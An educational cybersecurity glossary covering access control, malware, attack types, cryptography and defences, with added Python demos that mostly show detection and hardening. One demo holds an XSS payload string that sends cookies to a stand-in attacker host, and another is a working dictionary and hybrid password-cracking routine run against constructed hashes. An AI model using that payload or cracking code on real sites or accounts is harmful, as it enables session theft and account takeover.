Comprehensive Glossary

Cyber Security Terms, Tools, and Concepts


About This Glossary

This comprehensive glossary provides detailed definitions and explanations of over 150 terms related to cyber security, internet technologies, hacking techniques, security tools, attack methods, defense mechanisms, legal terminology, and forensic concepts. Each term includes:

A

Security Concept

Access Control

Definition: A security mechanism that restricts access to resources based on the identity of users or systems.

Detailed Explanation: Access control is fundamental to information security, determining who can view, use, or modify resources. It operates on the principle of least privilege, granting users only the minimum access necessary to perform their duties.

Types:

  • Discretionary Access Control (DAC): Resource owner controls access permissions
  • Mandatory Access Control (MAC): System enforces access based on security labels
  • Role-Based Access Control (RBAC): Access based on user roles
  • Attribute-Based Access Control (ABAC): Access based on attributes of users, resources, and environment

Examples: File permissions in operating systems, database user privileges, network firewall rules

Related Terms: Authentication, Authorization, AAA (Authentication, Authorization, Accounting)

Attack Type

Advanced Persistent Threat (APT)

Definition: A prolonged and targeted cyber attack in which an unauthorized user gains access to a network and remains undetected for an extended period.

Detailed Explanation: APTs are sophisticated, multi-stage attacks typically carried out by well-funded groups, often nation-states. The goal is usually espionage, data theft, or strategic positioning rather than immediate financial gain.

Characteristics:

  • Advanced: Uses sophisticated techniques and custom malware, falling back to commodity tooling wherever that is enough
  • Persistent: Maintains long-term presence in target networks and re-establishes access after partial clean-up
  • Threat: A human-operated adversary with intent, capability and funding, rather than an automated infection
  • Multi-stage: Reconnaissance, initial compromise, establishing foothold, escalating privileges, lateral movement, data exfiltration

Examples: Stuxnet (targeting Iranian nuclear facilities), APT29/Cozy Bear (attributed to Russian intelligence)

Related Terms: Zero-day Exploit, Lateral Movement, Command and Control (C2), Exfiltration

Security Tool

Antivirus (AV) Software

Definition: A program designed to detect, prevent, and remove malicious software from computer systems.

Detailed Explanation: Antivirus software uses multiple detection methods including signature-based detection (comparing files against known malware signatures), heuristic analysis (identifying suspicious behavior patterns), and sandboxing (executing files in isolated environments).

Components:

  • Scanner: Examines files and system memory
  • Virus Definitions: Database of known malware signatures
  • Quarantine: Isolated area for suspicious files
  • Real-time Protection: Continuous monitoring of system activities

Examples: Windows Defender, Norton, Kaspersky, McAfee, Bitdefender

Related Terms: Malware, Endpoint Security, Signature-based Detection, Heuristic Analysis

Security Concept

Authentication

Definition: The process of verifying the identity of a user, device, or system before granting access to resources.

Detailed Explanation: Authentication ensures that users are who they claim to be. It's the first line of defense in access control and can be implemented using various factors.

Authentication Factors:

  • Something You Know: Passwords, PINs, security questions
  • Something You Have: Smart cards, tokens, mobile devices
  • Something You Are: Biometrics (fingerprint, facial recognition, iris scan)
  • Somewhere You Are: Location-based authentication (GPS, IP address)
  • Something You Do: Behavioral biometrics (typing patterns, gait)

Multi-Factor Authentication (MFA): Uses two or more authentication factors for enhanced security

Related Terms: Authorization, Single Sign-On (SSO), Two-Factor Authentication (2FA), Biometrics

Security Concept

Authorization

Definition: The process of determining what resources and operations an authenticated user is permitted to access and perform.

Detailed Explanation: Authorization occurs after authentication and defines the scope of access granted to a user. It implements the principle of least privilege, ensuring users can only access resources necessary for their role.

Authorization Models:

  • Access Control Lists (ACLs): Lists specifying which users can access specific resources
  • Capability-based: Tokens granting specific access rights
  • Policy-based: Rules engine evaluating access requests

Examples: File permissions (read, write, execute), database access privileges, API access tokens

Related Terms: Authentication, Access Control, Least Privilege, Permissions
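
To make the Access Control models above and the authorization step concrete, here is an added example (not the glossary's own code) that layers attribute conditions (ABAC) on top of a role grant (RBAC) with a default-deny decision, and includes a least-privilege review that lists granted-but-unused permissions. The role catalogue, subject and resource attributes are constructed for the demo.

```python
"""Added example (not from the glossary): RBAC grant plus ABAC conditions, default deny."""
from dataclasses import dataclass

# Hypothetical role catalogue: each role maps to the permissions it grants.
ROLE_PERMISSIONS = {
    "viewer": {"report:read"},
    "analyst": {"report:read", "report:export"},
    "admin": {"report:read", "report:export", "report:delete", "user:manage"},
}


@dataclass
class Subject:
    name: str
    roles: set
    department: str
    mfa_verified: bool = False


@dataclass
class Resource:
    resource_id: str
    owner_department: str
    classification: str = "internal"   # "internal" or "restricted"


def rbac_permits(subject: Subject, action: str) -> bool:
    """Role-based check: does any of the subject's roles grant the action?"""
    return any(action in ROLE_PERMISSIONS.get(role, set()) for role in subject.roles)


def abac_permits(subject: Subject, action: str, resource: Resource, context: dict) -> bool:
    """Attribute-based conditions layered on top of the role grant (all must hold)."""
    if resource.classification == "restricted" and not subject.mfa_verified:
        return False   # restricted data requires a strongly authenticated session
    if action in {"report:export", "report:delete"} and resource.owner_department != subject.department:
        return False   # only the owning department may export or delete
    if action == "report:delete" and context.get("network") != "corp":
        return False   # destructive actions only from the corporate network
    return True


def authorize(subject: Subject, action: str, resource: Resource, context: dict) -> bool:
    """Default deny: the request passes only if the role grant AND every attribute condition hold."""
    return rbac_permits(subject, action) and abac_permits(subject, action, resource, context)


def unused_permissions(subject: Subject, actions_used: set) -> set:
    """Least-privilege review: permissions the roles grant that the subject never exercised."""
    granted = set().union(*(ROLE_PERMISSIONS.get(r, set()) for r in subject.roles))
    return granted - actions_used


if __name__ == "__main__":
    report = Resource("q3-report", "finance")
    analyst = Subject("ana", {"analyst"}, "finance", mfa_verified=True)
    print(authorize(analyst, "report:export", report, {"network": "corp"}))   # True
    print(unused_permissions(analyst, {"report:read"}))                        # {'report:export'}
```

Keeping the RBAC grant and the ABAC conditions in separate functions makes each policy reviewable on its own, and the `unused_permissions` report is the kind of evidence an access review needs before trimming a role.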

B

Attack Technique

Backdoor

Definition: A hidden method of bypassing normal authentication or security controls to gain unauthorized access to a system.

Detailed Explanation: Backdoors can be intentionally created by developers for maintenance purposes or maliciously installed by attackers after initial compromise. They provide persistent access to compromised systems.

Types:

  • Application Backdoors: Hidden features in software
  • System Backdoors: Modified system files or rootkits
  • Cryptographic Backdoors: Deliberately weakened algorithms or parameters (the Dual_EC_DRBG constants are the best-known case) that let whoever holds the trapdoor recover keys
  • Hardware Backdoors: Hidden functionality in chips or devices

Detection Methods: Code review, network traffic analysis, file integrity monitoring, behavioral analysis

Related Terms: Trojan Horse, Rootkit, Remote Access Trojan (RAT), Persistence Mechanisms

Security Tool

Backup

Definition: The process of creating copies of data to enable recovery in case of data loss, corruption, or disaster.

Detailed Explanation: Backups are critical for business continuity and disaster recovery. The 3-2-1 rule is a best practice: keep 3 copies of data, on 2 different media, with 1 copy off-site. Because ransomware deliberately seeks out reachable backups, at least one copy should be offline or immutable, and restores should be tested regularly; an untested backup is not a backup.

Backup Types:

  • Full Backup: Complete copy of all data (time-consuming, requires most storage)
  • Incremental Backup: Only changes since the last backup of any type (fastest, least storage, but a restore needs the full backup plus every incremental in the chain)
  • Differential Backup: Changes since the last full backup (a restore needs only the full backup plus the latest differential)
  • Mirror Backup: Exact copy of source data

Backup Strategies: Scheduled backups, continuous data protection, cloud backups, tape backups

Related Terms: Disaster Recovery, Business Continuity, Data Redundancy, Archive

Malware

Botnet

Definition: A network of compromised computers (bots or zombies) controlled by a central command and control (C2) server to perform coordinated malicious activities.

Detailed Explanation: Botnets are powerful tools for cybercriminals, enabling large-scale attacks using the combined resources of thousands or millions of infected devices. Owners are often unaware their devices are part of a botnet.

Common Uses:

  • DDoS Attacks: Overwhelming targets with traffic
  • Spam Distribution: Sending mass unsolicited emails
  • Credential Stuffing: Testing stolen credentials across websites
  • Cryptocurrency Mining: Using victim resources for mining
  • Click Fraud: Generating fake advertising clicks

Famous Examples: Mirai (IoT botnet), Emotet, Zeus, Conficker

Related Terms: Command and Control (C2), Zombie Computer, DDoS Attack, Malware

Attack Type

Brute Force Attack

Definition: A trial-and-error method of attempting to discover passwords, encryption keys, or other credentials by systematically trying all possible combinations.

Detailed Explanation: Brute force attacks rely on computational power rather than clever techniques. Success depends on password complexity, computing power available, and time constraints.

Variations:

  • Simple Brute Force: Trying all possible combinations
  • Dictionary Attack: Using wordlists of common passwords
  • Hybrid Attack: Combining dictionary words with character substitutions and suffixes
  • Reverse Brute Force (Password Spraying): Trying a few common passwords against many accounts, staying under per-account lockout thresholds
  • Credential Stuffing: Replaying known username/password pairs from breaches

Defense Mechanisms: Against online guessing: account lockout policies, CAPTCHA, rate limiting per account and per source, multi-factor authentication. Against offline attacks on stolen hashes: strong password requirements and slow, salted password hashing (bcrypt, scrypt, Argon2) so that every guess is expensive

Related Terms: Password Cracking, Rainbow Table, Dictionary Attack, Password Policy

C

Security Concept

CIA Triad

Definition: The three fundamental principles of information security: Confidentiality, Integrity, and Availability.

Detailed Explanation: The CIA Triad forms the foundation of information security policies and practices. Every security control should support one or more of these principles.

Components:

  • Confidentiality: Preventing unauthorized disclosure of information (encryption, access controls)
  • Integrity: Ensuring data accuracy and preventing unauthorized modifications (hashing, checksums, digital signatures)
  • Availability: Ensuring authorized access to resources when needed (redundancy, backups, DDoS protection)

Extensions: Some models add Authenticity and Non-repudiation; the Parkerian Hexad adds Possession/Control, Authenticity and Utility

Related Terms: Information Security, Data Protection, Security Controls

Attack Vector

Command and Control (C2)

Definition: Infrastructure used by attackers to maintain communication with compromised systems and issue commands to malware or botnets.

Detailed Explanation: C2 servers act as the central nervous system of cyber attacks, enabling attackers to control infected machines, exfiltrate data, and coordinate large-scale operations. Modern C2 systems use sophisticated techniques to evade detection.

C2 Communication Methods:

  • HTTP/HTTPS: Blending with normal web traffic
  • DNS Tunneling: Encoding commands in DNS queries
  • Social Media: Using public platforms for covert communication
  • P2P Networks: Decentralized peer-to-peer control
  • Dead Drop Resolvers: Indirect communication through third parties

Detection Techniques: Network traffic analysis, anomaly detection, threat intelligence feeds, behavioral analysis

Related Terms: Botnet, Malware, Exfiltration, Remote Access Trojan (RAT)
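
DNS tunnelling is detectable because the encoded commands show up as many long, random-looking subdomains under one domain. Here is an added example (not from the glossary) of that detection logic run over a constructed DNS query log: per client and registered domain it counts unique subdomains and measures their length and Shannon entropy. The log format, the thresholds and the "last two labels" domain split are assumptions for the demo.

```python
"""Added example (not from the glossary): flagging DNS tunnelling/C2 beacons in a
constructed query log by subdomain entropy, label length and unique-name churn."""
import hashlib
import math
from collections import defaultdict

# Constructed log lines: "<time> <client_ip> <qtype> <qname>". Normal browsing traffic,
# plus one client sending many long, random-looking subdomains to one domain.
NORMAL = [
    f"2024-05-01T10:00:{i:02d} 10.0.0.5 A {name}"
    for i, name in enumerate(["www.example.com", "mail.example.com", "cdn.example.com",
                              "www.example.com", "static.example.net", "api.example.org"] * 3)
]
TUNNEL = [
    f"2024-05-01T10:00:{i:02d} 10.0.0.7 TXT {hashlib.sha256(bytes([i])).hexdigest()[:48]}.c2-example.test"
    for i in range(25)
]
LOG = NORMAL + TUNNEL


def shannon_entropy(s: str) -> float:
    """Bits per character; hex data approaches 4.0, dictionary words sit well below 3.0."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def split_name(qname: str):
    """Naive split into (subdomain, registered domain): the last two labels are the base.
    Assumption for the demo; real tooling uses the Public Suffix List."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def detect_tunnels(log_lines, min_unique=10, min_entropy=3.0, min_len=20):
    """Alert on (client, domain) pairs with many unique, long, high-entropy subdomains."""
    stats = defaultdict(lambda: {"names": set(), "entropy": [], "length": []})
    for line in log_lines:
        _, client, _, qname = line.split()
        sub, base = split_name(qname)
        s = stats[(client, base)]
        s["names"].add(sub)
        s["entropy"].append(shannon_entropy(sub))
        s["length"].append(len(sub))
    alerts = []
    for (client, base), s in stats.items():
        uniq = len(s["names"])
        avg_ent = sum(s["entropy"]) / len(s["entropy"])
        avg_len = sum(s["length"]) / len(s["length"])
        if uniq >= min_unique and avg_ent >= min_entropy and avg_len >= min_len:
            alerts.append({"client": client, "domain": base, "unique_subdomains": uniq,
                           "avg_entropy": round(avg_ent, 2), "avg_label_len": round(avg_len, 1)})
    return alerts


if __name__ == "__main__":
    for alert in detect_tunnels(LOG):
        print(alert)
```

Content delivery networks and some anti-virus update services also generate long, hash-like names, so the thresholds need tuning against a baseline and an allowlist of known domains before this becomes an alert rather than a hunt query.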

Cryptography

Cryptography

Definition: The science of securing information by transforming it into an unreadable format (encryption) that can only be reversed by authorized parties with the correct key (decryption).

Detailed Explanation: Cryptography is essential for protecting data confidentiality, integrity, and authenticity in transit and at rest. It uses mathematical algorithms and keys to transform plaintext into ciphertext.

Types of Cryptography:

  • Symmetric Encryption: Same key for encryption and decryption (AES, ChaCha20; DES and 3DES are legacy and should not be used in new designs) - Fast but requires secure key exchange
  • Asymmetric Encryption: Different keys (public/private) for encryption and decryption (RSA, ECC) - Slower but enables secure key exchange
  • Hash Functions: One-way transformation for integrity verification (SHA-256, SHA-3, BLAKE2; MD5 and SHA-1 are broken against collisions)
  • Digital Signatures: A private-key signing operation over a hash of the message, verified with the public key, providing authentication and non-repudiation (RSA-PSS, ECDSA, Ed25519)

Applications: HTTPS/TLS, VPN, secure email (S/MIME, PGP), file encryption, password hashing, blockchain

Related Terms: Encryption, Decryption, Public Key Infrastructure (PKI), Digital Certificate, SSL/TLS

Attack Type

Cross-Site Scripting (XSS)

Definition: A web security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users.

Detailed Explanation: XSS attacks exploit inadequate input validation and output encoding in web applications. The malicious script executes in the victim's browser with the same privileges as legitimate website scripts.

Types of XSS:

  • Reflected XSS: Script included in request and immediately reflected in response (non-persistent)
  • Stored XSS: Script permanently stored on target server (in database, comments, forums) - More dangerous
  • DOM-based XSS: Vulnerability in client-side code (JavaScript) rather than server-side

Potential Impact: Session hijacking, credential theft, website defacement, malware distribution, phishing

Prevention: Context-aware output encoding (the primary defense), input validation, Content Security Policy (CSP), and the HttpOnly cookie flag (limits session-cookie theft but does not stop the injected script from acting as the user)

Related Terms: Web Application Security, SQL Injection, CSRF, Input Validation
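
The prevention list above turns on encoding for the right context. Here is an added example (not the glossary's own code) that renders the same user-controlled comment first by plain string concatenation and then with HTML-escaping for text and attribute contexts and a scheme allowlist for the URL context, plus a nonce-based CSP header as defence in depth. The markup template and the attack strings are constructed for the demo.

```python
"""Added example (not from the glossary): the same comment rendered without and with
context-appropriate output encoding, plus a CSP header. Inputs are constructed."""
import html
from urllib.parse import quote, urlsplit

ATTACK_TEXT = '<script>document.location="https://attacker.example/?c="+document.cookie</script>'
ATTACK_ATTR = '" onmouseover="alert(1)'          # breaks out of a quoted attribute
ATTACK_URL = "javascript:alert(document.domain)"  # escaping does not help in a URL context


def render_unsafe(author: str, comment: str, homepage: str) -> str:
    """Vulnerable: user input concatenated straight into the page."""
    return f'<p class="by" title="{author}"><a href="{homepage}">{author}</a>: {comment}</p>'


def safe_url(url: str) -> str:
    """URL context: allow only absolute http(s) URLs, then percent-encode, then HTML-escape."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return "#"   # rejects javascript:, data:, and scheme-relative tricks
    return html.escape(quote(url, safe=":/?#[]@!$&'()*+,;=%"), quote=True)


def render_safe(author: str, comment: str, homepage: str) -> str:
    """Hardened: html.escape for text and attribute contexts (quote=True also encodes
    the quote characters), and a scheme allowlist for the href."""
    a = html.escape(author, quote=True)
    return (f'<p class="by" title="{a}"><a href="{safe_url(homepage)}">{a}</a>: '
            f'{html.escape(comment, quote=True)}</p>')


def csp_header(nonce: str) -> str:
    """Defence in depth: only scripts carrying the per-response nonce may run."""
    return (f"default-src 'self'; script-src 'nonce-{nonce}' 'strict-dynamic'; "
            "object-src 'none'; base-uri 'none'")


if __name__ == "__main__":
    print(render_unsafe("mallory", ATTACK_TEXT, ATTACK_URL))   # script and javascript: URL survive
    print(render_safe("mallory", ATTACK_TEXT, ATTACK_URL))     # neutralised
    print(csp_header("r4nd0m"))
```

Note that `render_safe` never places user input inside a `<script>` block or an inline event handler; those contexts need JavaScript-string encoding, and the simplest policy is not to allow them at all, which is what the CSP enforces.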

Crime Type

Cybercrime

Definition: Criminal activities carried out using computers, networks, or the internet, either as the target or as the tool for committing traditional crimes.

Detailed Explanation: Cybercrime encompasses a wide range of illegal activities in the digital realm. It can be categorized by target (individuals, organizations, governments) or by nature (financial, data, access, content crimes).

Major Categories:

  • Financial Crimes: Online fraud, credit card theft, phishing, ransomware, cryptocurrency theft
  • Data Crimes: Data breaches, identity theft, corporate espionage
  • Content Crimes: Distribution of illegal content, copyright infringement
  • Access Crimes: Unauthorized system access, hacking, password cracking
  • Disruption Crimes: DDoS attacks, website defacement, sabotage

Global Impact: Widely cited industry projections (for example Cybersecurity Ventures) put the annual cost above $6 trillion worldwide as of 2021; these are estimates rather than measured losses

Related Terms: Hacking, Phishing, Malware, Identity Theft, Cyber Terrorism

Forensics

Cyber Forensics

Definition: The application of investigation and analysis techniques to gather and preserve evidence from digital devices for use in legal proceedings.

Detailed Explanation: Cyber forensics (also called digital forensics or computer forensics) involves the scientific collection, preservation, analysis, and presentation of digital evidence. It follows strict procedures to ensure evidence admissibility in court.

Forensic Process:

  • Identification: Recognizing potential sources of evidence
  • Preservation: Securing evidence and preventing tampering
  • Collection: Acquiring data using forensically sound methods
  • Analysis: Examining evidence to reconstruct events
  • Documentation: Recording all findings and procedures
  • Presentation: Reporting results in understandable format

Types: Computer forensics, mobile forensics, network forensics, cloud forensics, memory forensics

Tools: EnCase, FTK (Forensic Toolkit), Autopsy, Volatility, Wireshark

Related Terms: Chain of Custody, Evidence Collection, Write Blocker, Forensic Image

Crime Type

Cyber Stalking

Definition: The use of electronic communications to repeatedly harass, threaten, or intimidate an individual, causing fear or emotional distress.

Detailed Explanation: Cyber stalking is a serious crime that leverages digital platforms to target victims. Unlike traditional stalking, it can occur 24/7 from any location, making it particularly invasive and difficult to escape.

Common Methods:

  • Direct Harassment: Threatening emails, messages, or social media posts
  • Monitoring: Tracking victim's online activities and location
  • Impersonation: Creating fake profiles or accounts
  • Doxing: Publishing private information publicly
  • Cyberbullying: Coordinated harassment campaigns
  • Spyware: Installing monitoring software on victim's devices

Legal Framework (India): IPC Section 354D (Stalking), IT Act Section 67 (Publishing obscene material)

Related Terms: Cyberbullying, Doxing, Harassment, Identity Theft

Crime Type

Cyber Terrorism

Definition: The use of cyberattacks by politically or ideologically motivated groups to intimidate, coerce, or cause fear in populations or governments.

Detailed Explanation: Cyber terrorism targets critical infrastructure, government systems, or civilian populations to advance political or ideological goals. It represents the convergence of terrorism and cyber warfare.

Potential Targets:

  • Critical Infrastructure: Power grids, water systems, transportation
  • Financial Systems: Banking, stock exchanges
  • Healthcare: Hospitals, medical devices
  • Government: Military, intelligence, emergency services
  • Communications: Internet, telephone networks

Objectives: Disruption, destruction, propaganda, fundraising, recruitment, coordination

Related Terms: Critical Infrastructure, Cyber Warfare, APT, Hacktivism

D

Attack Type

Denial of Service (DoS) Attack

Definition: An attack that makes a computer resource unavailable to its intended users by overwhelming it with a flood of requests or exploiting vulnerabilities.

Detailed Explanation: DoS attacks aim to disrupt services rather than gain unauthorized access or steal data. They can cause significant financial losses and damage to reputation.

Types of DoS Attacks:

  • Volume-based: Overwhelming bandwidth (UDP flood, ICMP flood)
  • Protocol-based: Exploiting protocol weaknesses (SYN flood, Ping of Death)
  • Application-layer: Targeting web applications (HTTP flood, Slowloris)
  • DDoS (Distributed DoS): Coordinated attack from multiple sources (botnets)

Defense Mechanisms: Traffic filtering, rate limiting, DDoS mitigation services (Cloudflare, Akamai), load balancing, over-provisioning bandwidth

Related Terms: DDoS, Botnet, Amplification Attack, SYN Flood

Attack Type

Dictionary Attack

Definition: A password cracking technique that uses a pre-compiled list of words (dictionary) to guess passwords.

Detailed Explanation: Dictionary attacks are more efficient than brute force because they focus on likely passwords rather than trying all possible combinations. They exploit the tendency of users to choose simple, memorable passwords.

Attack Process:

  • Compile list of common words, phrases, and previously leaked passwords
  • Include variations (capitalization, number substitutions, common suffixes)
  • Hash each word using the target hashing algorithm
  • Compare hashed dictionary entries with target password hashes

Defense: Password policies that reject dictionary words and known-breached passwords, account lockout and rate limiting against online guessing, and salted, slow password hashing (bcrypt, scrypt, Argon2) so that stolen hashes cannot be attacked with one precomputed table

Related Terms: Brute Force Attack, Password Cracking, Rainbow Table, Hybrid Attack
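
The attack process above, and the hybrid variation listed under Brute Force Attack, are shown here as an added example that is not the glossary's own code. It mangles a tiny constructed wordlist with case, leet and suffix rules, then cracks the same three constructed accounts twice: once against unsalted SHA-256, where one table of candidate hashes serves every account, and once against salted PBKDF2-HMAC-SHA256, where every guess must be recomputed per user and each costs thousands of HMACs. The wordlist, rules, passwords and iteration count are assumptions for the demo.

```python
"""Added example (not from the glossary): dictionary/hybrid cracking against unsalted
fast hashes versus salted, iterated hashes. Wordlist and targets are constructed here."""
import hashlib
import os

WORDLIST = ["password", "welcome", "summer", "letmein", "dragon"]   # tiny constructed wordlist
SUFFIXES = ["", "1", "123", "!", "2024", "!1"]
LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})


def candidates(word: str):
    """Hybrid rules: case variants, leet substitutions, common suffixes."""
    bases = {word, word.capitalize(), word.upper()}
    bases |= {b.translate(LEET) for b in list(bases)}
    for base in sorted(bases):
        for suffix in SUFFIXES:
            yield base + suffix


def crack_unsalted(targets: dict) -> tuple:
    """targets: user -> hex SHA-256 of the password (no salt).
    One precomputed table of candidate hashes is reused against every account."""
    table = {}
    for word in WORDLIST:
        for cand in candidates(word):
            table[hashlib.sha256(cand.encode()).hexdigest()] = cand
    found = {user: table[h] for user, h in targets.items() if h in table}
    return found, len(table)   # second value: size of the one-off table


def crack_salted(targets: dict, iterations: int) -> tuple:
    """targets: user -> (salt, PBKDF2-HMAC-SHA256 digest). Every guess must be
    recomputed per user (unique salt) and each costs `iterations` HMACs."""
    found, guesses = {}, 0
    for user, (salt, digest) in targets.items():
        for word in WORDLIST:
            for cand in candidates(word):
                guesses += 1
                if hashlib.pbkdf2_hmac("sha256", cand.encode(), salt, iterations) == digest:
                    found[user] = cand
                    break
            if user in found:
                break
    return found, guesses * iterations   # second value: HMAC invocations performed


def make_unsalted(passwords: dict) -> dict:
    return {u: hashlib.sha256(p.encode()).hexdigest() for u, p in passwords.items()}


def make_salted(passwords: dict, iterations: int) -> dict:
    stored = {}
    for user, pw in passwords.items():
        salt = os.urandom(16)   # unique per user, stored beside the digest
        stored[user] = (salt, hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, iterations))
    return stored


# Constructed accounts: two weak passwords, one passphrase outside the wordlist.
PASSWORDS = {"alice": "Summer2024", "bob": "letmein", "carol": "correct horse battery staple"}
DEMO_ITERATIONS = 5_000   # kept low for the demo; real deployments use far more, or Argon2/bcrypt


if __name__ == "__main__":
    print(crack_unsalted(make_unsalted(PASSWORDS)))
    print(crack_salted(make_salted(PASSWORDS, DEMO_ITERATIONS), DEMO_ITERATIONS))
```

Both runs recover alice and bob and fail on carol, but the second value returned shows the difference that matters: the unsalted run did a few hundred hashes for all accounts combined, while the salted run did hundreds of thousands of HMACs and the cost grows linearly with the number of accounts and the iteration count. Tools such as hashcat apply exactly these mangling rules at scale from rule files.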

Security Tool

Digital Certificate

Definition: An electronic document that uses a digital signature to bind a public key with an identity (person, organization, server).

Detailed Explanation: Digital certificates are issued by Certificate Authorities (CAs) and are essential for establishing trust in online communications. They enable secure connections (HTTPS), email encryption, and code signing.

Certificate Components:

  • Subject: Entity to whom certificate is issued
  • Public Key: Public key of the certificate holder
  • Issuer: Certificate Authority that issued the certificate
  • Validity Period: Start and expiration dates
  • Digital Signature: CA's signature validating certificate authenticity
  • Extensions: Additional information (key usage, alternative names)

Types: SSL/TLS certificates, code signing certificates, email certificates, client certificates

Related Terms: Public Key Infrastructure (PKI), Certificate Authority (CA), SSL/TLS, Digital Signature

Cryptography

Digital Signature

Definition: A mathematical scheme for verifying the authenticity and integrity of digital messages or documents.

Detailed Explanation: Digital signatures provide authentication (verifying sender identity), non-repudiation (sender cannot deny signing), and integrity (detecting message tampering). They use asymmetric cryptography.

How It Works:

  • Signing: Hash the document, then apply the signer's private key to the (padded) hash; for RSA this is the private-key exponentiation, loosely described as "encrypting the hash"
  • Verification: Apply the signer's public key to the signature and compare the result with a freshly computed hash of the document
  • If the hashes match, the signature is valid and the document is unmodified; any change to the document changes its hash and fails verification

Applications: Software distribution, email security (S/MIME), PDF documents, financial transactions, legal contracts

Standards: RSA (PKCS#1 v1.5 and RSA-PSS), DSA (Digital Signature Algorithm), ECDSA (Elliptic Curve DSA), EdDSA (Ed25519)

Related Terms: Public Key Cryptography, Hash Function, Digital Certificate, Non-repudiation

Security Technique

Disaster Recovery (DR)

Definition: A set of policies, tools, and procedures to enable the recovery or continuation of vital technology infrastructure and systems following a disaster.

Detailed Explanation: Disaster recovery focuses on restoring IT systems, data, and infrastructure after events like cyberattacks, hardware failures, natural disasters, or human errors.

Key Components:

  • DR Plan: Documented procedures for recovery
  • Backup Strategy: Regular, tested backups of critical data
  • Recovery Time Objective (RTO): Maximum acceptable downtime
  • Recovery Point Objective (RPO): Maximum acceptable data loss
  • Hot Site: Fully equipped backup facility ready for immediate use
  • Cold Site: Basic facility requiring equipment setup

Testing: Regular DR drills, tabletop exercises, failover testing

Related Terms: Business Continuity, Backup, High Availability, Failover

Privacy

Doxing

Definition: The malicious practice of researching and publicly broadcasting private or identifying information about an individual without their consent.

Detailed Explanation: Doxing (from "dropping documents" or "docs") involves collecting personal information from various sources and publishing it online, often with malicious intent to harass, intimidate, or endanger the target.

Information Typically Exposed:

  • Real name, address, phone number
  • Email addresses, social media profiles
  • Employment information, financial details
  • Family member information
  • Photos, videos, private communications

Purposes: Harassment, intimidation, revenge, silencing critics, enabling physical threats

Legal Status: May violate privacy laws, harassment statutes, or cyberstalking legislation

Related Terms: Cyber Stalking, Swatting, Online Harassment, Privacy Violation

E

Cryptography

Encryption

Definition: The process of converting plaintext (readable data) into ciphertext (unreadable format) using an algorithm and encryption key.

Detailed Explanation: Encryption is fundamental to data confidentiality, protecting information from unauthorized access during transmission or storage. Only those with the correct decryption key can reverse the process.

Encryption Types:

  • Symmetric Encryption: Same key for encryption/decryption
    • Fast and efficient for large data
    • Examples: AES-256, ChaCha20, Twofish
    • Challenge: Secure key distribution
  • Asymmetric Encryption: Different keys (public/private)
    • Solves key distribution problem
    • Slower, used for key exchange or small data
    • Examples: RSA, ECC, ElGamal

Applications: HTTPS, VPN, encrypted email, full disk encryption, file/folder encryption, database encryption

Related Terms: Decryption, Cryptography, Cipher, Key Management

Security Mechanism

Endpoint Security

Definition: The practice of securing end-user devices (laptops, desktops, mobile devices, servers) against cyber threats.

Detailed Explanation: Endpoints are common attack vectors as they're directly accessible to users and often outside the protected corporate network. Endpoint security provides multiple layers of protection.

Components:

  • Antivirus/Anti-malware: Detecting and removing malicious software
  • Endpoint Detection and Response (EDR): Advanced threat detection and investigation
  • Device Control: Managing USB and external device usage
  • Firewall: Controlling network traffic
  • Encryption: Protecting data at rest
  • Application Control: Whitelisting approved applications

Modern Approaches: Cloud-based management, AI/ML threat detection, zero trust architecture

Related Terms: Antivirus, EDR, Mobile Device Management (MDM), Data Loss Prevention (DLP)

Attack Technique

Exploit

Definition: A piece of software, code, or sequence of commands that takes advantage of a vulnerability to cause unintended behavior in software or hardware.

Detailed Explanation: Exploits leverage security flaws to gain unauthorized access, escalate privileges, execute code, or cause denial of service. They're key tools in attackers' arsenals.

Exploit Types:

  • Zero-day Exploit: Targets a vulnerability unknown to the vendor, so no patch exists when it is used
  • Remote Exploit: Works over a network without prior system access
  • Local Exploit: Requires local access to the target system
  • Client-side Exploit: Targets client applications (browsers, email clients)
  • Server-side Exploit: Targets server software and services

Exploit Frameworks: Metasploit, Canvas, Core Impact (used by penetration testers and attackers)

Related Terms: Vulnerability, Patch, Zero-day, Proof of Concept (PoC)

F

Security Tool

Firewall

Definition: A network security device that monitors and controls incoming and outgoing network traffic based on predetermined security rules.

Detailed Explanation: Firewalls act as barriers between trusted internal networks and untrusted external networks (like the internet). They're the first line of defense in network security architecture.

Firewall Types:

  • Packet Filtering: Examines packet headers (source/destination IP, port, protocol)
  • Stateful Inspection: Tracks connection states and context
  • Proxy Firewall: Intermediary between clients and servers
  • Next-Generation Firewall (NGFW): Deep packet inspection, application awareness, IPS integration
  • Web Application Firewall (WAF): Protects web applications from attacks

Deployment: Hardware appliances, software applications, cloud-based services

Rule Configuration: Default deny (allowlist: only explicitly permitted traffic passes) vs. default allow (blocklist: only explicitly blocked traffic is stopped). Default deny is the recommended posture, and rule order matters because the first matching rule normally decides

Related Terms: Network Security, Access Control List (ACL), Intrusion Prevention System (IPS)
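
The packet-filtering and rule-configuration points above, as an added example that is not the glossary's own code: a small first-match rule base evaluated under default-deny and default-allow, with a check for shadowed rules (rules that can never fire because an earlier rule already covers everything they match). The rule syntax and the ruleset are constructed for the demo.

```python
"""Added example (not from the glossary): a first-match packet-filter rule base evaluated
under default-deny versus default-allow, plus a shadowed-rule check. Rules are constructed."""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    action: str      # "allow" or "deny"
    proto: str       # "tcp", "udp" or "any"
    src: object      # ip_network or "any"
    dst: object      # ip_network or "any"
    dport: object    # int or "any"

    def matches(self, proto, src_ip, dst_ip, dport) -> bool:
        return ((self.proto == "any" or self.proto == proto)
                and (self.src == "any" or src_ip in self.src)
                and (self.dst == "any" or dst_ip in self.dst)
                and (self.dport == "any" or self.dport == dport))

    def covers(self, other) -> bool:
        """True when every packet `other` could match is already matched by this rule."""
        return ((self.proto == "any" or self.proto == other.proto)
                and (self.src == "any" or (other.src != "any" and other.src.subnet_of(self.src)))
                and (self.dst == "any" or (other.dst != "any" and other.dst.subnet_of(self.dst)))
                and (self.dport == "any" or self.dport == other.dport))


def parse_rule(line: str) -> Rule:
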